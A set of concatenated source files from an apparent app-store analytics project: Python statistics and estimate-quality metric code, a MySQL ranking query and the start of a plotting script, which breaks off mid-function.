x = np.array(x) + 0.5
if x.ndim==1:
# only one observed set of counts
return x/x.sum()
else:
# multiple sets of observed counts, an estimate is made for each set of count independently
return x/np.tile(x.sum(axis=1)[:,np.newaxis],(1,x.shape[1]))
def estimate_ci(p, n, samples_size=1000000, prior='Jeffreys', confidence=95):
'''
Compute confidence interval for multinomial with given p and n by:
- sampling from the distribution
- computing estimates on p from these samples
- determining the set of nearest (euclidian distance) samples that falling within the confidence interval
- computing confidence bounds from the largest differences between true and samples event probabilities
:param p: array-like, shape (n_events)
Vector containing the event probabilities.
:param n: integer
Number of trials.
:param samples_size: integer, optional
Number of sample drawn from multinomial used for determining ci (defaults to 1000000).
:param prior: string, optional
String specifying the prior that should be used in the process if estimating the event probabilities from a
drawn sample. Currently only Jeffrey's prior is supported, different option will all go for ML estimate instead
of posterior (defaults to Jeffreys)
:param confidence: float, in range of [0,100]
Percentile to compute which must be between 0 and 100 inclusive (defaults to 95).
:return: tuple of numpy arrays, shape (n_events)
Two arrays giving the maximum absolute confidence ranges in negative and positive direction
'''
# sample from multinomial with n=number of trails and p=event probabilities
X = np.random.multinomial(n, p, size=samples_size)
# compute event probabilities for each sample
P = estimate_p(X, prior=prior)
# determine eucledian distance between sampled and true event probabilities
d = np.sqrt(np.sum((P-np.tile(p,(samples_size,1)))**2, axis=1))
# determine max distance such that confidence percentage of the sampled event probabilities falls within that
# boundary
d_max = np.percentile(d, confidence)
sel_ci=(d<=d_max)
n_ci = sel_ci.sum()
# compute the max absolute probability differences between event probabilities of true and sampled events for
# all those samples that fall within the confidence interval
p_diff = np.max(np.abs(P[sel_ci,:]-np.tile(p[np.newaxis,:],(n_ci,1))), axis=0)
# determine the min and max probabilities per event by adding/subtracting the max absolute probability differences
# from the true p, using a cutoff at p_i=0 or p_i=1
p_min = p-p_diff
p_min[p_min<0] = 0
p_max = p+p_diff
p_max[p_max>1] = 1
#return negative and positive confidence ranges
return p-p_min, p_max-p<file_sep>/financial-product-benchmark/combined-sample_size/sql_files/get_analytics_apps_appstore.sql
-- SET @country_list:='JP,NL';
-- SET @start_date:='2014-01-01';
-- SET @rank_limit := 400;
DROP TEMPORARY TABLE IF EXISTS temp.top100_gross;
SET @select_apps_stmtn_prepare := CONCAT(
'CREATE TEMPORARY TABLE temp.top100_gross
(CONSTRAINT PRIMARY KEY (appstore_instance_id,type,application_id))
SELECT
x1.*
FROM (
SELECT
x.iso_code,
x.device,
x.type,
x.external_id,
IF( @prev=CONCAT(\'1\',\'-\',x.iso_code,\'-\',x.device,\'-\',x.type),
@rank := @rank+1,
@rank := 1 AND (@prev:=CONCAT(\'1\',\'-\',x.iso_code,\'-\',x.device,\'-\',x.type))
) as rank,
x.name,
x.publisher,
x.application_id,
x.appstore_instance_id
FROM (
SELECT
cn.iso_code,
t.type,
IF(ai.device_id =1 , \'iPhone\', \'iPad\') as device,
a.external_id,
a.name,
a.publisher,
e.application_id,
e.appstore_instance_id,
sum(IF(t.type=\'gross\',e.revenue, e.downloads)) as value
FROM estimates_dev.estimates_month_appstore e
JOIN appstore.appstore_instances ai ON ai.id = e.appstore_instance_id
JOIN appstore.countries cn ON cn.id = ai.country_id
JOIN appstore.applications a ON a.id = e.application_id
JOIN (select \'gross\' as type UNION select \'paid\' as type) t
WHERE
e.date = \'',@start_date,'\' AND
FIND_IN_SET(UPPER(cn.iso_code),@country_list) AND
ai.device_id in (1,2) AND
(t.type = \'gross\' OR (type=\'paid\' AND e.estimate_type=\'paid_downloads\') )
GROUP BY cn.iso_code, ai.device_id, t.type, e.application_id
ORDER BY iso_code, device, type, value DESC
) x, (SELECT @rank:=0, @prev:=\'\') dummy
) x1
WHERE
x1.rank<=',@rank_limit)
;
PREPARE select_apps_stmtn FROM @select_apps_stmtn_prepare;
EXECUTE select_apps_stmtn;
DROP TEMPORARY TABLE IF EXISTS temp.select_dates;
CREATE TEMPORARY TABLE temp.select_dates
SELECT
DISTINCT(date)
FROM
appstore.downloads
WHERE
date < DATE_ADD(DATE(@start_date), INTERVAL 1 MONTH)
AND date>=@start_date
;
SELECT
@start_date as start_date,
DATE_SUB(DATE_ADD(DATE(@start_date),INTERVAL 1 MONTH), INTERVAL 1 DAY) as end_date,
t.iso_code,
t.type,
t.device,
t.external_id,
t.application_id,
t.rank,
t.name,
t.publisher,
SUM(IFNULL(d.application_id, 0))>0 as d_analytics_app
FROM
temp.top100_gross t
JOIN appstore.countries cn ON
cn.iso_code = t.iso_code
JOIN appstore.appstore_instances ai ON
cn.id = ai.country_id
JOIN temp.select_dates dt
LEFT JOIN appstore.downloads d ON
d.application_id = t.application_id
AND d.appstore_instance_id = ai.id
AND dt.date = d.date
GROUP BY t.appstore_instance_id,t.type, t.application_id
ORDER BY t.appstore_instance_id,t.type, t.rank
;<file_sep>/audience/loaded_dice/lib/__init__.py
__author__ = 'srhmtonk'
<file_sep>/old_investigations/estimates_quality.py
'''
Created on Jan 18, 2013
@author: perezrafael
'''
import pandas as pd
import os, os.path
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import statsmodels.api as sm
import numpy as np
from internal.stores_dict import category_dict
from internal.stores_dict import market_dict
from internal.stores_dict import type_dict
from internal.stores_dict import country_dict
from public_company_apps import public_company_apps
from scipy.stats import ks_2samp
import cProfile
import time
public_company_apps_b = pd.DataFrame({'app_id':list(public_company_apps)})
#COUNTRIES = ['143441', '143465', '143462', '143466']
CATEGORIES = []
FEEDS = []
COUNTRIES = ['143465']
#COUNTRIES = ['10', '3', '9', '27']
MONTH = '2012-07'
#DATE = '2012-07-01'
DATE = None
DATA_DIR = '/Users/perezrafael/appannie/data'
ESTIMATES_DIR = '/Users/perezrafael/appannie/data/cache/raw_estimation_lowess_monthly'
REFERENCES_DIR = '/Users/perezrafael/appannie/data/cache/references'
OUT_FILE = '%s/metrics_lowess_monthly_ALL_estimates_2013-03-26.csv'%DATA_DIR
METRIC_COLUMNS = [
'% of Top 20 analytics apps over 20% error',
'% of Top 200 analytics apps over 20% error',
'% of Top 200 analytics apps over 10% and 100 units error',
'% of 201-1000 ranked apps 20% error',
'% of all apps over 10% and 100 units error',
'Repetition ratio by date',
'Repetition ratio by rank',
#'Median 7 days autocorrelation',
'Top20 Median absolute error',
'Top20 Median relative error',
'Top20 % of actuals from estimates',
'21-200 Median absolute error',
'21-200 Median relative error',
'21-200 % of actuals from estimates',
'201-1000 Median absolute error',
'201-1000 Median relative error',
'201-1000 % of actuals from estimates',
'Total Actuals count',
'Total Estimates count',
'Multiple category Estimates Mean Standard Deviation',
'Distributions similarity KS-stat',
'Distributions similarity p-value',
'Date',
'Country',
'Category',
'Feed',
'Model',
'Range']
METRICS = [pd.DataFrame(columns=METRIC_COLUMNS)]
def append_diff(df):
"""
Calculate differece between real values and SBE.
Add them to the DataFrame
"""
if 'sbe' in df.columns:
df['diff'] = df['units'] - df['sbe']
else:
df['diff'] = df['units'] - df['estimate']
df['absolute_diff'] = df['diff'].abs()
df['relative_diff'] = (df['absolute_diff']*1.0) / df['units']
df['absolute_r2'] = df['absolute_diff'] ** 2
df['relative_r2'] = df['relative_diff'] ** 2
return df
def append_sbe(df, unit):
"""
Calculate SBE per date-country-app
"""
gdf = df.groupby(['store_id', 'date', 'feed_id', 'app_id'])['estimate'].mean()
gdf = gdf.reset_index()
if unit=='downloads':
gdf = gdf[(gdf['feed_id']==0) | (gdf['feed_id']==101) | (gdf['feed_id']==1) | (gdf['feed_id']==100)]
elif unit=='usd':
gdf = gdf[(gdf['feed_id']==2) | (gdf['feed_id']==102)]
ddf = gdf.groupby(['store_id', 'date', 'app_id'])['estimate'].sum().reset_index()
ddf.rename(columns={'estimate':'sbe'}, inplace=True)
ddf = gdf.merge(ddf, on=['store_id', 'date', 'app_id'])
ddf = ddf.drop('estimate', axis=1)
df = df.merge(ddf, on=['store_id', 'date', 'app_id', 'feed_id'])
return df
def error_ratio(df, max_relative_diff=0.2, max_absolute_diff=None, rank_range=[1,1000]):
"""
Range: 0-1
Optimal Value: 0
Heavy error ratio counts how many apps fall outside of two different thresholds,
max_relative_diff is the highest acceptable relative error,
max_absolute_diff is the highes acceptable absolute error.
Apps that fall outside these maximums will be counted as heavy errors.
"""
try:
gdf = df[['date', 'app_id', 'units']].drop_duplicates().groupby(['date'])
top_apps = pd.DataFrame(columns=['date', 'app_id'])
for name, group in gdf:
group = group.dropna().sort('units', ascending=False)
group = group[rank_range[0]:rank_range[1]]
group = group[['date', 'app_id']]
top_apps = top_apps.append(group)
df = df.merge(top_apps, on=['date', 'app_id'])
df = df[['date', 'app_id', 'relative_diff', 'absolute_diff']].drop_duplicates()
df = df.groupby(['date', 'app_id']).mean().reset_index()
total_count = df.shape[0]
if max_absolute_diff is None:
error_count = df[df['relative_diff']>=max_relative_diff].shape[0]
else:
error_count = df[(df['relative_diff']>=max_relative_diff) & (df['absolute_diff']>=max_absolute_diff)].shape[0]
score = (error_count*1.0)/total_count
except:
return None
return score
def get_error_metrics(df, rank_range=[1,1000]):
"""
Basic error metrics based on distance between
estimates and real values.
The lower these are the more accurate the model is.
"""
metrics = [None, None, None, None, None, None, None]
try:
df = df[(df['rank']>=rank_range[0]) & (df['rank']<=rank_range[1])]
actuals_count = df[df['units']>=0][['app_id', 'units']].drop_duplicates().shape[0]
if 'sbe' in df.columns:
estimates_count = df[df['sbe']>=0][['app_id','sbe']].drop_duplicates().shape[0]
else:
estimates_count = df[df['estimate']>=0][['app_id','estimate']].drop_duplicates().shape[0]
actuals_ratio = actuals_count*1.0/estimates_count
df = df.dropna()
df = df.groupby(['date', 'app_id']).mean().reset_index()
metrics = [
df['relative_diff'].max(),
df['absolute_diff'].max(),
df['relative_r2'].median(),
df['absolute_r2'].median(),
df['absolute_diff'].median(),
df['relative_diff'].median(),
actuals_ratio]
except:
return metrics
return metrics
def repetition_ratio(df, by='date'):
"""
Range: 0-1
Optimal value: 0
Repetition ratio measures how many estimates were repeated
either by date or rank
The algorithm should not generate the same estimate for
two different ranks in the same date or
two different dates for the same rank
"""
df = df[['date', 'store_id', 'rank','category_id', 'feed_id', 'estimate']]
total_estimates = df.shape[0]
df_estimates = df.groupby(['store_id','category_id', 'feed_id', by, 'estimate']).size()
repeated_estimates = df_estimates[df_estimates>1].sum()
repetition_ratio = (repeated_estimates*1.0)/total_estimates
return repetition_ratio
def incompleteness_ratio(df, target_estimates):
"""
Range: 0-1
Optimal value: 0
Incompleteness ratio measures how many estimates did the algorithm miss,
ideally it should generate estimates for all the ranks,
but due to lack of data, not enough actuals/ranks/etc
this is not always possible
"""
incompleteness = 1.0 - ((df.shape[0]*1.0)/target_estimates)
return incompleteness
def load_estimates(estimates_dir, month, country, other=None):
"""
Read estimates from CSV files and aggregate into DataFrame
"""
estimates = pd.DataFrame(columns=['category_id', 'rank', 'app_id', 'estimate', 'date', 'feed_id', 'store_id'])
country = '%s_'%country
month = '_%s'%month
for root, dirs, files in os.walk(estimates_dir):
for f in files:
if country in f and month in f and '.csv' in f:
if other is not None and '%s.csv'%other not in f:
continue
fullpath = os.path.join(root, f)
df = pd.read_csv(fullpath)
if df.shape[0]>0:
estimates = estimates.append(df)
return estimates
def plot_actuals_vs_estimates(df, fig_file=None, which='downloads', rank_range=[1,1000]):
"""
Plotting function
"""
df = df[(df['rank']>=rank_range[0]) & (df['rank']<=rank_range[1])]
df = df[['sbe', 'units', 'date', 'app_id', 'store_id']]
df.drop_duplicates(inplace=True)
plt.plot(df['units'], df['sbe'], 'b.', alpha=0.4)
plt.plot(df['units'], df['units'], 'r')
plt.grid(True, which='both')
plt.xlabel(which)
plt.ylabel('SBE')
plt.title('%s VS SBE'%which)
plt.savefig(fig_file)
def median_autocorrelation(df, which='downloads', expected_cycle=7, by='rank', fig_file=None):
"""
Calculate autocorrelation of estimates by rank or date.
Higher autocorrelation at the expected cycle means
the model is following a cyclycal trend,
e.g. more downloads in the weekends.
"""
gdf = df[['store_id', 'category_id', 'feed_id', by, 'estimate']]
gdf = gdf.groupby(['store_id', 'category_id', 'feed_id', by])
corr_array = []
for estimates in gdf['estimate'].values:
autocorrelation = sm.tsa.stattools.acf(estimates)
for i in range(len(autocorrelation)):
if len(corr_array) == i:
corr_array.append([])
corr_array[i].append(np.abs(autocorrelation[i]))
if fig_file is not None:
plt.clf()
ax = plt.subplot(111)
ax.boxplot(corr_array)
ax.set_xticklabels(range(len(corr_array)))
#plt.grid(True, axis='x')
plt.xlabel('Lag')
plt.ylabel('Autocorrelation')
plt.title('Autocorrelation of %s estimates series by country, category, feed, %s'%(which, by))
plt.savefig(fig_file)
median_ac = np.median(corr_array[expected_cycle])
return median_ac
def plot_app_series(df, top=50, which='downloads', what='sbe', fig_file=None):
dates = pd.DataFrame({'date':df['date'].drop_duplicates()})
fdf = select_downloads_or_usd(df, unit=which)
fdf = fdf[['date', 'app_id', what]].drop_duplicates()
day_count = fdf.groupby('app_id').size().reset_index()
day_count = day_count[day_count[0]==dates.shape[0]][['app_id']]
#fdf = fdf.merge(day_count, on='app_id')
top_apps = fdf.groupby('app_id')[what].max().reset_index()
top_apps = top_apps.dropna().sort(what, ascending=False)
top_apps = top_apps[:top][['app_id']]
fdf = fdf.merge(top_apps, on='app_id')
fdf = fdf.groupby('app_id')
plt.clf()
for app_data in fdf:
app_data = app_data[1].sort('date')
#if app_data.shape[0]==dates.shape[0]:
app_data = app_data.merge(dates, on='date', how='outer').sort('date').reset_index()
if what=='sbe':
plt.plot(app_data.index, app_data[what])
elif what=='units':
plt.plot(app_data.index, app_data[what], '.')
plt.xlabel('Day')
plt.ylabel(what)
plt.title(fig_file)
plt.savefig(fig_file)
def append_universal(df):
"""
Calculate which apps are universally ranked and add a flag to the DataFrame.
This function is different from production model in that
it only flags as universal an app that is ranked in different devices
in the same day, for that day only.
"""
universals_dir = '%s/cache/universals'%DATA_DIR
if not os.path.exists(universals_dir):
os.makedirs(universals_dir)
index_df = df['date'].drop_duplicates()
flag = False
for date in index_df:
try:
df1 = pd.read_csv('%s/%s_%s.csv'%(universals_dir, CURRENT_COUNTRY, date))
df1['universal'] = 1
df = df.merge(df1, on=['app_id', 'date'], how='left')
flag = True
except:
flag = False
if flag:
return df
rdf = df
universals = pd.DataFrame(columns=['date', 'app_id', 'feed_id', 'category_id', 'rank', 'estimate', 'units', 'universal'])
for index, series in df[['category_id']].drop_duplicates().iterrows():
category = series['category_id']
cdf = df[df['category_id']==category][['date', 'app_id', 'feed_id', 'category_id']]
fdf = cdf[(cdf['feed_id']==0) | (cdf['feed_id']==101)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['category_id'] = category
fdf['feed_id'] = 0
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 101
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==1) | (cdf['feed_id']==100)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 1
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 100
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf = cdf[(cdf['feed_id']==2) | (cdf['feed_id']==102)]
if fdf.shape[0]>0:
fdf = fdf.groupby(['date', 'app_id']).count()
fdf = fdf[fdf['app_id']>1]
fdf = fdf[['feed_id', 'category_id']].reset_index()
fdf['universal'] = 1
fdf['feed_id'] = 2
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
fdf['feed_id'] = 102
rdf = rdf.merge(fdf, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
if rdf[rdf['universal'] == 1].shape[0]>0:
universals = universals.append(rdf[rdf['universal'] == 1])
rdf = rdf.drop('universal', axis=1)
universals = universals[['date', 'category_id', 'feed_id', 'app_id', 'universal']]
rdf = rdf.merge(universals, on=['date', 'category_id', 'feed_id', 'app_id'], how='left')
gdf = rdf[rdf['universal'] == 1][['date', 'app_id']].drop_duplicates().groupby(['date'])
for date, group in gdf:
group.to_csv('%s/%s_%s.csv'%(universals_dir, CURRENT_COUNTRY, date), index=False)
return rdf
def append_estimates(df, estimates, unit='downloads'):
"""
Self-explanatory
"""
if unit=='downloads':
estimates = estimates[(estimates['feed_id']==0) | (estimates['feed_id']==101) | (estimates['feed_id']==1) | (estimates['feed_id']==100)]
elif unit=='usd':
estimates = estimates[(estimates['feed_id']==2) | (estimates['feed_id']==102)]
df = df.rename(columns={'revenue':'units'})
else:
return 0
df = df.merge(estimates, on=['date', 'app_id'], how='right')
return df
def plot_daily_curve(df, plots_dir, model_name):
gdf = df.groupby(['date', 'store_id', 'category_id', 'feed_id'])
full_dir = '%s/%s'%(plots_dir, model_name)
if not os.path.exists(full_dir):
os.makedirs(full_dir)
for name, group in gdf:
plt.clf()
ax = plt.subplot(111)
p1, = plt.plot(group['rank'], group['estimate'], 'r.', alpha=0.9)
if 'universal' in group.columns:
universals = group[group['universal'] == 1]
p2, = plt.plot(group['rank'], group['units'], 'b.', alpha=0.9)
if 'universal' in group.columns:
p3, = plt.plot(universals['rank'], universals['units'], 'g^', alpha=0.9)
plt.xlabel('Rank')
ax.set_xscale('log')
ax.set_yscale('log')
if 'universal' in group.columns:
plt.legend([p1, p2, p3], ['Estimates', 'Actuals', 'Universals'])
else:
plt.legend([p1, p2], ['Estimates', 'Actuals'])
title= '%s_%s_%s_%s_%s_%s_%s_curve'%(name[0], country_dict[name[1]], name[2],category_dict[name[2]], market_dict[name[3]], type_dict[name[3]], model_name)
plt.title(title)
plt.savefig('%s/%s.png'%(full_dir, title))
def to_vw_string(x, name):
return '%s:%s'%(x,name)
def format_to_vw(df, date, country, unit):
df = df[df['date']==date]
df['date'] = df.apply(lambda x: x['date'].replace('-',''), axis=1)
df = df[['units', 'category_id', 'feed_id', 'rank', 'app_id']]
df['app_id'] = np.int64(df['app_id'])
train = df[df['units']>=0]
for column in train.columns:
if column=='units':
train[column] = df.apply(lambda x: '%s |' % (x[column]), axis=1)
else:
train[column] = df.apply(lambda x: '%s:%s' % (column, x[column]), axis=1)
train.to_csv('%s_%s_%s_vw_train.txt'%(date, country, unit), sep=' ', header=False, index=False)
test = df
for column in test.columns:
if column=='units':
test[column] = df.apply(lambda x: '%s |' % (x[column]), axis=1)
else:
test[column] = df.apply(lambda x: '%s:%s' % (column, x[column]), axis=1)
test.to_csv('%s_%s_%s_vw_test.txt'%(date, country, unit), sep=' ', header=False, index=False)
def compare_estimates(df):
"""
Range: 0~
Smaller values are better.
Generate Standard Deviation of estimates per date-store-app-feed.
This is, the standard deviation of the estimates
from different categories for the same app.
Smaller STD represents less variation in estimates,
and could represent better accuracy.
"""
df = df[['date', 'store_id', 'app_id', 'feed_id', 'estimate']]
gdf = df.groupby(['date', 'store_id', 'app_id', 'feed_id'])
count = gdf.count()
total = count.shape[0]
multiple_categories = count[count['estimate']>1].shape[0]
op = gdf.std()
op = op.dropna(subset = ['estimate'])
return op['estimate'].mean()
def select_downloads_or_usd(df, columns=None, unit='downloads'):
if unit=='downloads':
df = df[(df['feed_id']==0) | (df['feed_id']==101) | (df['feed_id']==1) | (df['feed_id']==100)]
elif unit=='usd':
df = df[(df['feed_id']==2) | (df['feed_id']==102)]
else:
return
if columns is None:
df.drop_duplicates(inplace=True)
else:
df = df[columns].drop_duplicates()
return df
def compare_distributions(df, unit='downloads'):
"""
Range: 0~
Use Kolmogorov-Smirnof statistic to test if CDF of actuals
and estimates belong to the same distribution.
If they belong to the same distribution could mean correct estimates.
ks_stat[0] is the K-S statistic, smaller values are better
ks_stat[1] is the p-value, higher values are better
"""
if 'sbe' in df.columns:
df = df[['date', 'store_id', 'app_id', 'feed_id', 'sbe', 'units']]
actuals = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'units'], unit).dropna()
sbe = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'sbe'], unit).dropna()
ks_stat = ks_2samp(actuals['units'], sbe['sbe'])
else:
df = df[['date', 'store_id', 'app_id', 'feed_id', 'estimate', 'units']]
actuals = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'units'], unit).dropna()
sbe = select_downloads_or_usd(df, ['date', 'store_id', 'app_id', 'estimate'], unit).dropna()
ks_stat = ks_2samp(actuals['units'], sbe['estimate'])
return ks_stat
def plot_sbe_vs_actuals(df, plots_dir, model_name):
df = df[['units', 'sbe']].drop_duplicates()
full_dir = '%s/%s'%(plots_dir, model_name)
plt.clf()
ax = plt.subplot(111)
p1, = plt.plot(df['units'], df['sbe'], 'r.', alpha=0.4)
p1, = plt.plot(df['units'], df['units'], 'b.', alpha=0.4)
ax.set_xscale('log')
ax.set_yscale('log')
#title= '%s_%s_%s_%s_%s_%s_%s_curve'%(name[0], country_dict[name[1]], name[2],category_dict[name[2]], market_dict[name[3]], type_dict[name[3]], model_name)
#plt.title(title)
plt.savefig('%s/%s.png'%(full_dir, 'test'))
pass
def gen_by_curve(df, estimates, other, unit='downloads', period='daily', model_name=None):
df = append_estimates(df, estimates, unit)
df = append_sbe(df, unit)
plots_dir = '%s/plots'%DATA_DIR
if not os.path.exists(plots_dir):
os.makedirs(plots_dir)
#This detects universally ranked apps and tags them in the universal column (Process intensive)
#df = append_universal(df)
#This saves file to csv
#df.to_csv('%s_%s_%s_%s_estimates_actuals_sbe.csv'%(month, country, model_name, unit), index=False)
#This plots all the curves (Process intensive)
plot_daily_curve(df, plots_dir, model_name)
#plot_sbe_vs_actuals(df, plots_dir, model_name)
#This plots series of actuals, for reference
#plot_app_series(df,top=app_top, which=unit, what='sbe', fig_file='%s/%s_%s_%s_%s_sbe_per_app.png'%(plots_dir, month, country, model_name, unit))
#plot_app_series(df, top=app_top, which=unit, what='units', fig_file='%s/%s_%s_%s_%s_actuals_per_app.png'%(plots_dir, month, country, model_name, unit))
df = append_diff(df)
gdf = df.groupby(['date', 'store_id', 'category_id', 'feed_id'])
#gdf = df.groupby(['date', 'store_id'])
for name, group in gdf:
name = list(name)
#name.append('ALL')
#name.append('ALL')
#Here we generate the metrics
estimates_std = compare_estimates(group)
ks_stat = compare_distributions(group, unit)
actuals_count = group[group['units']>0]['app_id'].drop_duplicates().shape[0]
if 'sbe' in group.columns:
estimates_count = group[group['sbe']>0]['app_id'].drop_duplicates().shape[0]
else:
estimates_count = group[group['estimate']>0]['app_id'].drop_duplicates().shape[0]
m_20_top20 = error_ratio(group, 0.2, rank_range=[0,20])
m_20_top200 = error_ratio(group, 0.2, rank_range=[0,200])
m_10_100_top200 = error_ratio(group, 0.1, 100, rank_range=[0,20])
score_80_20 = error_ratio(group, 0.2, rank_range=[201,1000])
big_error_score = error_ratio(group, 0.1, 100)
#metrics = get_error_metrics(group, [1,1000])
r1_20_metrics = get_error_metrics(group, [0,20])
r21_200_metrics = get_error_metrics(group, [21,200])
r201_1000_metrics = get_error_metrics(group, [201,1000])
repeated_by_date = repetition_ratio(group, 'date')
repeated_by_rank = repetition_ratio(group, 'rank')
#plot_actuals_vs_estimates(df, fig_file='%s_%s_%s_%s_vs_estimates.png'%(month, country, model_name, unit), which=unit, rank_range=[1,1000])
#if df['date'].drop_duplicates().shape[0]>1:
# median_7_acf = median_autocorrelation(estimates, which=unit, expected_cycle=7, by='rank', fig_file='%s/%s_%s_%s_%s_autocorrelation.png'%(plots_dir, month, country, model_name, unit))
# median_7_daily = median_autocorrelation(estimates, which=unit, expected_cycle=7, by='date', fig_file='%s/%s_%s_%s_%s_daily_autocorrelation.png'%(plots_dir, month, country, model_name, unit))
result = []
result.append(m_20_top20)
result.append(m_20_top200)
result.append(m_10_100_top200)
result.append(score_80_20)
result.append(big_error_score)
result.append(repeated_by_date)
result.append(repeated_by_rank)
#result.append(median_7_acf)
result.append(r1_20_metrics[4])
result.append(r1_20_metrics[5])
result.append(r1_20_metrics[6])
result.append(r21_200_metrics[4])
result.append(r21_200_metrics[5])
result.append(r21_200_metrics[6])
result.append(r201_1000_metrics[4])
result.append(r201_1000_metrics[5])
result.append(r201_1000_metrics[6])
result.append(actuals_count)
result.append(estimates_count)
result.append(estimates_std)
result.append(ks_stat[0])
result.append(ks_stat[1])
result.append(name[0])
result.append(name[1])
result.append(name[2])
result.append(name[3])
result.append(other)
result.append(period)
row = pd.DataFrame([result], columns=METRIC_COLUMNS)
METRICS[0] = METRICS[0].append(row, ignore_index=True)
METRICS[0].to_csv(OUT_FILE, index=False)
return result
def only_public_apps(df):
df = df[df['app_id'].isin(public_company_apps)]
return df
def run_loop(country, month, date=None, other=None):
use = month
if date is not None:
use = date
daily_actuals_downloads = pd.read_csv('%s/real_units_%s_%s_Downloads.csv'%(REFERENCES_DIR, country, month))
daily_actuals_usd = pd.read_csv('%s/real_units_%s_%s_USD.csv'%(REFERENCES_DIR, country, month))
select = 6
if select==1:
model_name = 'sliding_window_0'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==2:
model_name = 'original'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==3:
model_name = 'bertrand'
df = pd.read_csv('/Users/perezrafael/appannie/data/2012-07_Bertrand.csv')
daily_estimates = pd.read_csv('/Users/perezrafael/appannie/data/data_science/2012-07_Bertrand.csv')
if select==4:
model_name = 'sliding_window_0_curves_2'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==5:
model_name = 'sliding_window_0_curves_0_no_top_newpl'
daily_estimates = load_estimates(ESTIMATES_DIR, month, country)
if select==6:
model_name = 'lowess%s'%other
app_ids = load_estimates( '%s/cache/raw_estimation_original'%DATA_DIR, use, country)
app_ids = app_ids[['app_id', 'category_id', 'rank', 'date', 'feed_id', 'store_id']]
daily_estimates = load_estimates(ESTIMATES_DIR, use, country, other)
daily_estimates = daily_estimates.drop('app_id', axis=1).drop('date', axis=1)
#daily_estimates = daily_estimates.merge(app_ids, on=['category_id', 'rank', 'date', 'feed_id', 'store_id'])
daily_estimates = daily_estimates.merge(app_ids, on=['category_id', 'rank', 'feed_id', 'store_id'])
#daily_estimates = only_public_apps(daily_estimates)
#daily_actuals_downloads = only_public_apps(daily_actuals_downloads)
#daily_actuals_usd = only_public_apps(daily_actuals_usd)
monthly_estimates = daily_estimates.groupby(['store_id', 'category_id', 'feed_id', 'app_id'])
monthly_estimates = monthly_estimates.agg({'estimate' : np.sum,
'rank' : np.median})
monthly_estimates = monthly_estimates.reset_index()
monthly_estimates['date'] = month
monthly_actuals_downloads = daily_actuals_downloads.groupby(['app_id']).sum().reset_index()
monthly_actuals_downloads['date'] = month
monthly_actuals_usd = daily_actuals_usd.groupby(['app_id']).sum().reset_index()
monthly_actuals_usd['date'] = month
if date is None:
print '========= MONTHLY DOWNLOADS ==============================='
res = gen_by_curve(monthly_actuals_downloads, monthly_estimates, other, 'downloads', 'monthly', model_name)
print '========= MONTHLY USD ====================================='
res = gen_by_curve(monthly_actuals_usd, monthly_estimates, other, 'usd', 'monthly', model_name)
else:
print '========= DAILY DOWNLOADS ================================='
res = gen_by_curve(daily_actuals_downloads, daily_estimates, other, 'downloads', 'daily', model_name)
print '========= DAILY USD ======================================='
res = gen_by_curve(daily_actuals_usd, daily_estimates, other, 'usd', 'daily', model_name)
if __name__ == '__main__':
for country in COUNTRIES:
print '========= %s ==============================='%country
#for f in np.arange(0.1, 0.6, 0.1):
#for f in np.arange(0.01, 1, 0.01):
start = time.time()
#print '========= %s ==============================='%f
CURRENT_COUNTRY = country
run_loop(country, MONTH, DATE)
print 'That took %.5fs'%(time.time() - start)
METRICS[0].to_csv(OUT_FILE, index=False)<file_sep>/plotting/plot_single_app.py
'''
Created on May 6, 2013
@author: perezrafael
'''
import pandas as pd
from pandas.io import sql
import numpy as np
import matplotlib.pyplot as plt
import psycopg2
import config
import os
import datetime as dt
import matplotlib.dates as mdates
from os import listdir
from os.path import isfile, join
import string
import unicodedata
import re
def slugify(value):
#value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore')
value = unicode(re.sub('[^\w\s-]', '-', value).strip().lower())
value = unicode(re.sub('[-\s]+', '-', value))
return value
def get_app_names(df, platform):
if platform == 'ios':
conn = psycopg2.connect("dbname=aa user=aa host=nile")
app_ids = df['app_id'].values
query = 'SELECT id as app_id, name FROM aa_app WHERE id in (%s)'%','.join(str(x) for x in app_ids)
elif platform == 'android':
conn = psycopg2.connect("dbname=aa_android user=aa host=nile")
app_ids = df.apply(lambda x: "'%s'"%x['app_id'], axis=1).values
query = 'SELECT class as app_id, name FROM app WHERE class in (%s)'%','.join(str(x) for x in app_ids)
app_names = sql.frame_query(query, con=conn)
df = df.merge(app_names, on='app_id')
conn.close()
return df
def get_top_apps(df, top, category):
df = df[df['category_id']==category]
df = df[df['rank']<=top]
